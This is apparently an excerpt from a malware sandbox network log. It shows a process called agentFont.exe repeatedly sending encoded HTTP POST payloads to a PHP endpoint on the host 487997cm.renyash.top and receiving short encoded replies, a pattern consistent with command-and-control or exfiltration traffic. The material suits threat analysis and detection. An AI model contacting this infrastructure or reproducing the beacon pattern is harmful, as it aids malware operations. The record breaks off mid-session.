                                                                                  Jan 1, 2025 11:27:40.798018932 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.449765185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:40.928271055 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:41.284043074 CET1044OUTData Raw: 51 50 5d 5f 54 40 55 50 59 5f 5b 52 5a 5b 59 5d 55 55 54 5d 51 5f 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]_T@UPY_[RZ[Y]UUT]Q_[^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^+2"#<&5:=S%$/>6%.$?)Q+$/_5>9?&X"#\.,
                                                                                  Jan 1, 2025 11:27:41.561975002 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:41.689655066 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.449766185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:41.825207949 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.449767185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:42.149741888 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:42.502964020 CET1340OUTData Raw: 51 57 58 5e 54 40 55 5c 59 5f 5b 52 5a 58 59 52 55 55 54 5b 51 5f 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QWX^T@U\Y_[RZXYRUUT[Q_[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.]+!! [%=9.=;2"X$<5&=0!R*;\#.6?&X"#\.
                                                                                  Jan 1, 2025 11:27:42.789659023 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:42.918970108 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 59 28 36 27 5d 33 5d 31 51 27 2e 3b 1f 2b 20 32 1f 38 05 3a 00 26 5c 30 5b 2b 55 2b 52 3f 15 36 15 2b 13 24 11 26 32 34 56 26 1f 2a 51 00 1c 23 1e 3c 3b 37 5a 2a 38 32 1f 28 32 23 15 2b 12 19 5a 35 03 3b 51 27 15 35 0e 25 3e 3f 5d 28 59 3c 56 2c 0b 28 06 38 33 3f 11 24 1c 2f 52 09 14 22 03 3e 23 0d 54 32 32 25 00 33 0e 38 04 22 16 3f 13 37 54 36 0c 34 20 27 11 28 2d 33 5b 20 31 32 5a 24 3c 21 1b 3f 2d 06 0e 35 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: 'Y(6']3]1Q'.;+ 28:&\0[+U+R?6+$&24V&*Q#<;7Z*82(2#+Z5;Q'5%>?](Y<V,(83?$/R">#T22%38"?7T64 '(-3[ 12Z$<!?-5>#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.449768185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:42.396454096 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:42.759423971 CET1044OUTData Raw: 54 50 58 5f 51 40 55 5c 59 5f 5b 52 5a 58 59 55 55 54 54 5c 51 58 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TPX_Q@U\Y_[RZXYUUTT\QX[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?T) -?&9--+V%%'?:!C>'-S>43".6(:&X"#\.
                                                                                  Jan 1, 2025 11:27:43.043335915 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:43.171889067 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.449769185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:43.374691963 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:43.721446037 CET1044OUTData Raw: 54 54 5d 59 51 43 50 5a 59 5f 5b 52 5a 5b 59 5d 55 5e 54 5e 51 5f 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TT]YQCPZY_[RZ[Y]U^T^Q_[^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.[(97?%-"->8$?\'!"'Y6>$<")X?&X"#\.,
                                                                                  Jan 1, 2025 11:27:44.020859003 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:44.188510895 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:40 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.449770185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:44.321674109 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:44.674659967 CET1044OUTData Raw: 54 52 5d 58 54 4a 50 5b 59 5f 5b 52 5a 5f 59 50 55 52 54 5d 51 5d 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TR]XTJP[Y_[RZ_YPURT]Q][]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(!*4<%.=,-%,%3Z*#&.$/+'/^"=Y?:&X"#\.<
                                                                                  Jan 1, 2025 11:27:44.986103058 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:45.123768091 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.449771185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:45.256104946 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:45.618340969 CET1044OUTData Raw: 54 53 5d 5c 54 40 55 59 59 5f 5b 52 5a 58 59 57 55 50 54 5f 51 5b 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TS]\T@UYY_[RZXYWUPT_Q[[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^(>#.?&.-/W1<.\0:_!&%?V)$!?:&X"#\.
                                                                                  Jan 1, 2025 11:27:45.911818981 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:46.050118923 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.449772185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:46.237535000 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:46.596477032 CET1044OUTData Raw: 51 56 5d 59 54 42 55 5c 59 5f 5b 52 5a 5f 59 5c 55 57 54 5a 51 5f 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QV]YTBU\Y_[RZ_Y\UWTZQ_[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z?2R4=%..8%?X$<6"=U'>*#5[*(&X"#\.<
                                                                                  Jan 1, 2025 11:27:46.875072002 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:47.006314039 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:43 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.449773185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:47.138432026 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:47.487095118 CET1040OUTData Raw: 54 55 58 5f 54 45 55 5d 59 5f 5b 52 5a 5a 59 52 55 51 54 5a 51 5e 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TUX_TEU]Y_[RZZYRUQTZQ^[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(T>#>$%E,-#U&)'?"651$5*';![!^(&X"#\.
                                                                                  Jan 1, 2025 11:27:47.803410053 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:47.935796976 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.449774185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:47.946681023 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:48.299663067 CET1340OUTData Raw: 51 56 5d 58 54 45 55 59 59 5f 5b 52 5a 5e 59 51 55 5f 54 51 51 59 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QV]XTEUYY_[RZ^YQU_TQQY[^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+27-82=-U&/:3<Z!9W3?1S=$,6:<&X"#\.8
                                                                                  Jan 1, 2025 11:27:48.588768959 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:48.718908072 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:45 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 58 2a 18 2b 5c 24 3b 25 1a 30 3d 30 08 29 30 2a 5d 2c 2f 25 11 31 5c 27 01 3f 0d 3c 0a 3f 2b 08 1a 3c 3e 37 05 25 1c 20 55 26 25 2a 51 00 1c 23 1e 28 5d 2b 1c 28 2b 32 50 28 21 30 04 2b 02 16 05 35 3a 0d 51 26 2b 2e 55 30 04 27 5a 2b 59 2f 0e 3b 26 27 5a 2e 20 27 5a 30 0c 2f 52 09 14 21 11 2a 23 37 1d 32 0c 21 07 27 30 34 05 35 06 2c 0c 34 21 29 1c 23 55 2c 01 3f 03 2b 13 22 0f 07 01 25 12 22 44 3e 3d 27 52 22 2e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: 'X*+\$;%0=0)0*],/%1\'?<?+<>7% U&%*Q#(]+(+2P(!0+5:Q&+.U0'Z+Y/;&'Z. 'Z0/R!*#72!'045,4!)#U,?+"%"D>='R".#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.449775185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:48.088246107 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:48.440243959 CET1044OUTData Raw: 54 5a 58 5c 54 45 55 50 59 5f 5b 52 5a 5e 59 54 55 5e 54 5f 51 58 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZX\TEUPY_[RZ^YTU^T_QX[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+1"7.?$>*@90$<:]0.X"T3?=Q='#"=!Y?&X"#\.8
                                                                                  Jan 1, 2025 11:27:48.743572950 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:48.877841949 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:45 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.2.449776185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:49.006201982 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:49.362082958 CET1044OUTData Raw: 51 50 5d 5f 54 41 50 5c 59 5f 5b 52 5a 59 59 57 55 57 54 50 51 59 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]_TAP\Y_[RZYYWUWTPQY[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^)"=T#-(1=..4&?.$<6Y!6:'=='\".)_?&X"#\.$
                                                                                  Jan 1, 2025 11:27:49.764300108 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:49.918359995 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:46 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.2.449777185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:50.051424980 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:50.410548925 CET1044OUTData Raw: 54 57 5d 52 54 41 55 58 59 5f 5b 52 5a 52 59 57 55 51 54 5d 51 5e 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TW]RTAUXY_[RZRYWUQT]Q^[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\)"#=$]%:>420,."&9$%Q*'[#>>)*&X"#\.
                                                                                  Jan 1, 2025 11:27:50.696917057 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:50.827826977 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.2.449778185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:51.331902981 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:51.690320015 CET1044OUTData Raw: 51 52 58 59 54 4b 50 5c 59 5f 5b 52 5a 53 59 54 55 57 54 58 51 51 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
